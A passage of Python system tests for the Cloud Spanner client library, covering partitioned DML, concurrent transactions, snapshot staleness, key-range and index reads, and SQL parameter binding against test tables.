"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
